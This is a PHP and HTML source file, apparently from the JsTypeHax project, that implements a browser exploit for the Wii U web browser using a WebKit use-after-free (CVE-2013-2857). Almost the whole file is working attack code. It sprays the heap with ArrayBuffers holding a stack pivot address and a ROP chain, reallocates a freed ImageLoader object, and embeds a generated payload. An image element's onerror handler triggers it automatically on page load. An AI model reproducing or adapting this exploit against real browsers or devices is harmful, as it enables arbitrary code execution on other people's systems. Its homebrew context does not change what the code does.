mirror of
https://github.com/wiiu-env/JsTypeHax.git
synced 2024-11-17 16:09:15 +01:00
132 lines
4.8 KiB
PHP
132 lines
4.8 KiB
PHP
<?php
|
|
//Useful function
|
|
function hexentities($str) {
|
|
$return = '';
|
|
for($i = 0; $i < strlen($str); $i += 4) {
|
|
$return .= '0x'.bin2hex(substr($str, $i, 4)).', ';
|
|
}
|
|
return $return;
|
|
}
|
|
|
|
// Settings
|
|
$_REQUEST['sysver'] = '550'; // Currently hardcoded.
|
|
$generatebinrop = 1; // Make sure the $ROPCHAIN will be in binary.
|
|
|
|
// Type 4 params
|
|
$payload_tmp_address = 0x1D000000;
|
|
$payload_start_search = 0x1B800000;
|
|
$valid_payload_dst_address = 0x1D500000;
|
|
$payload_search_for = 0xDEADAFFE;
|
|
|
|
// Needed for ROP execution
|
|
$pivotAdress = 0x010ADDCC; // don't change this.
|
|
$pivotAdressAdress = 0x1B800000; // where does this come from? Seems to be stable with the current spraying
|
|
$ROPHEAP = $payload_tmp_address - 0x1000; //+ is a BAD idea as is may override our payload
|
|
|
|
//$ropchainselect = 1; // Put codebin on heap and search it.
|
|
//$ropchainselect = 2; // Put codebin into ROP (Only works with reaaaaaally small payloads.
|
|
//$ropchainselect = 3; // Print string at payload_srcaddr.
|
|
$ropchainselect = 4; // Print string at payload_srcaddr.
|
|
|
|
/**
|
|
Expects a wiiuhaxx_common_cfg.php with the following variables
|
|
|
|
$wiiuhaxxcfg_payloadfilepath = "code550.bin"; // The actual payload that will be loaded.
|
|
$wiiuhaxxcfg_searchpayloadfilepath = "wiiuhaxx_common/wiiuhaxx_searcher.bin";
|
|
**/
|
|
require_once("wiiuhaxx_common/wiiu_browserhax_common.php");
|
|
|
|
// Only call this once!
|
|
generate_ropchain();
|
|
?>
|
|
|
|
<!--
|
|
Tested on 5.5.1
|
|
CVE-2013-2857
|
|
Use after free https://bugs.chromium.org/p/chromium/issues/detail?id=240124
|
|
Result: Bug is present, crash
|
|
-->
|
|
<script>
|
|
function UaF(a){
|
|
var pivotAdress = <?php echo $pivotAdress ?>;
|
|
//5.5.2
|
|
{
|
|
var pivotAdressAdress = <?php echo $pivotAdressAdress ?>; //r6
|
|
}
|
|
|
|
var codegenAddress = 0x01800000; // don't change this.
|
|
var sizeWebCoreImageLoader = 0x18; // don't change this.
|
|
|
|
var _16K = 0x4000;
|
|
var _4K = 0x1000;
|
|
|
|
//radio is the *ONLY* type that left the freed WebCore::ImageLoader free !
|
|
a.type="radio";
|
|
|
|
//Allocate this new WebCore::ImageLoader over freed WebCore::
|
|
var ab = new ArrayBuffer(sizeWebCoreImageLoader);
|
|
var dv = new DataView(ab)
|
|
|
|
/*
|
|
0:000:x86> dt webkit!WebCore::ImageLoader
|
|
+0x000 __VFN_table : Ptr32
|
|
+0x004 m_client : Ptr32 WebCore::ImageLoaderClient
|
|
+0x008 m_image : WebCore::CachedResourceHandle<WebCore::CachedImage>
|
|
+0x00c m_failedLoadURL : WTF::AtomicString
|
|
+0x010 m_hasPendingBeforeLoadEvent : Pos 0, 1 Bit
|
|
+0x010 m_hasPendingLoadEvent : Pos 1, 1 Bit
|
|
+0x010 m_hasPendingErrorEvent : Pos 2, 1 Bit
|
|
+0x010 m_imageComplete : Pos 3, 1 Bit
|
|
+0x010 m_loadManually : Pos 4, 1 Bit
|
|
+0x010 m_elementIsProtected : Pos 5, 1 Bit
|
|
*/
|
|
//Register:r3 Adress:0x1AF35330-0x1AF35360
|
|
dv.setUint32(0x00, 0x00000000); //vtable
|
|
dv.setUint32(0x04, pivotAdressAdress); //m_client
|
|
dv.setUint32(0x08, pivotAdressAdress); //m_image
|
|
dv.setUint32(0x0C, 0x00000000); //m_failedLoadURL
|
|
dv.setUint32(0x10, 0x00000000); //m_hasPendingBeforeLoadEvent
|
|
dv.setUint32(0x14, 0x00000000); //padding
|
|
|
|
<?php echo "var realROPChain = [" . hexentities($ROPCHAIN) . "]"; ?>
|
|
|
|
<?php echo "var payload= [" . hexentities(wiiuhaxx_generatepayload()) . "];"; ?>
|
|
|
|
//Spray large ArrayBuffer with pivotAdress, increase the spray for a bigger ROP exeuction chance (affects the position of the payload)
|
|
var ar = new Array(0x1800*2);
|
|
for(var i=0; i<0x1800*2; i++){
|
|
ar[i] = new DataView(new ArrayBuffer(_4K));
|
|
for(var j=0; j<_4K; j+=8){
|
|
ar[i].setFloat64(j, 0x10000000+j); //filler
|
|
}
|
|
|
|
ar[i].setUint32(0x204, 0x0);
|
|
ar[i].setUint32(0x018, pivotAdressAdress);
|
|
ar[i].setUint32(0x000, pivotAdressAdress+0x20);
|
|
ar[i].setUint32(0x2BC, pivotAdress); //lwz r0, 0x4(r11) ; mtlr r0 ; mr r1, r11 ; li r3, -0x1 ; blr ;
|
|
//r11, new stack location
|
|
ar[i].setUint32(0x208, pivotAdressAdress+0x300);
|
|
|
|
//initialize this Rop Chain
|
|
var ropCurrentOffset = 0x304;
|
|
|
|
//start of the Rop Chain
|
|
realROPChain.forEach(function(element) {
|
|
ar[i].setUint32(ropCurrentOffset, element);
|
|
ropCurrentOffset += 4;
|
|
});
|
|
}
|
|
var payloadBuffer = new DataView(new ArrayBuffer(_16K));
|
|
payloadBuffer.setUint32(0, <?php echo $payload_search_for ?>); // Place search for value
|
|
var curOffset = 4;
|
|
for(var curI = 0; curI< payload.length;curI++){
|
|
payloadBuffer.setUint32(curOffset,payload[curI]);
|
|
curOffset += 4;
|
|
}
|
|
|
|
//Use the new WebCore::ImageLoader & pivot !
|
|
return 0;
|
|
}
|
|
</script>
|
|
|
|
<input id="x" type="image" onerror="UaF(this);" src=""/>
|